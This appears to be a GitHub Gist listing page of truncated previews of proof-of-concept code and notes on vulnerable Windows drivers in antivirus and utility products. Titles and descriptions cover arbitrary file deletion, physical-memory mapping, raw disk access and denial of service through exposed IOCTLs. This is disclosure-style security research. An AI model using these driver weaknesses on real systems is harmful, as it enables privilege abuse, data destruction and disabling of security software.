
hfiref0x / enetech_new.c
Created August 12, 2020 12:26
EneTech newest variant (May 2020) unlock, (app+dll)
#include <windows.h>
#include <cstdio>
#include "ntos.h"
#define WINIO_DEVICE_TYPE (DWORD)0x8010   /* device type of the driver's WinIO-compatible IOCTL codes; presumably combined with the function IDs below via CTL_CODE - confirm against the IOCTL macro that follows */
#define WINIO_MAP_FUNCID (DWORD)0x810     /* function ID of the "map" request (the IOCTL name below indicates it maps physical memory for the user-mode caller) */
#define WINIO_UNMAP_FUNCID (DWORD)0x811   /* function ID of the matching "unmap" request */
#define IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY \
#pragma warning(disable: 4005)
#include <windows.h>
#include <cstdio>
#include <ntstatus.h>
typedef NTSTATUS (NTAPI *pfnNtCreateEnclave)(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID* BaseAddress,
_In_ ULONG_PTR ZeroBits,
hfiref0x / SecureAPlus.c
Created February 28, 2020 05:45
SecureAPlus driver DoS
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
hfiref0x / imf.c
Created February 26, 2020 16:33
IObit Malware Fighter ImfObCallback.sys features
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
hfiref0x / zam.md
Created February 26, 2020 06:52
MalwareFox ZAM backdoor IOCTL list

The most interesting IOCTLs exposed by ZAM64.SYS (ZAMGUARD64.SYS).

All parameters to these functions are supplied from user mode via the DeviceIoControl input buffer. Every IOCTL listed here is reachable by any local user (no administrative rights required) on a machine where this driver is loaded.

0x8000202C

Arbitrary file deletion: resets the file attributes via ZwSetInformationFile and then calls ZwDeleteFile on the caller-supplied path.

0x80002030

Wrapper around ZwQuerySystemInformation(SystemProcessInformation), returning the result to the user-mode caller.

hfiref0x / bkavsp.c
Created February 25, 2020 18:35
BKAVSP Arbitrary File Deletion
#pragma warning(disable: 4005)
#include <windows.h>
#include <strsafe.h>
#include <ntstatus.h>
#include "ntos.h"
#if defined (_MSC_VER)
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
hfiref0x / desc.txt
Created February 25, 2020 08:07
SUPERAntispyware backdoor
This describes saskutil64.sys 1.0.0.1016, the driver shipped with SUPERAntispyware 8.0.0.1050 (current at the time of writing), in both the Free and Pro editions.
The SaskCallDriver function operates on a fixed-size buffer sent from user mode.
This buffer is a structure defined as follows:
#pragma pack(push, 1)
typedef struct _CALL_DRV {
WCHAR DeviceName[2048]; //e.g. \Device\Harddisk0\DR0
LARGE_INTEGER StartingOffset;
SIZE_T DataSize;
PVOID DataPtr; //pointer to user mode allocated buffer of DataSize length.
int main()
{
HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\MaxProc64"),
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL);
__int64 __fastcall DrvDispatch(PDEVICE_OBJECT DeviceObject, _IRP *Irp)
{
_IO_STACK_LOCATION *StackLocation;
_IRP *_Irp;
__int64 Id;
StackLocation = Irp->Tail.Overlay.CurrentStackLocation;
_Irp = Irp;
switch ( StackLocation->Parameters.DeviceIoControl.IoControlCode )
{
hfiref0x / 0.c
Created February 22, 2020 07:34
IOBit WinRing0 hack-o-rama
#include <windows.h>
#include "ntos.h"
#include <cstdio>
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
_In_ PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_In_opt_ PVOID OutputBuffer,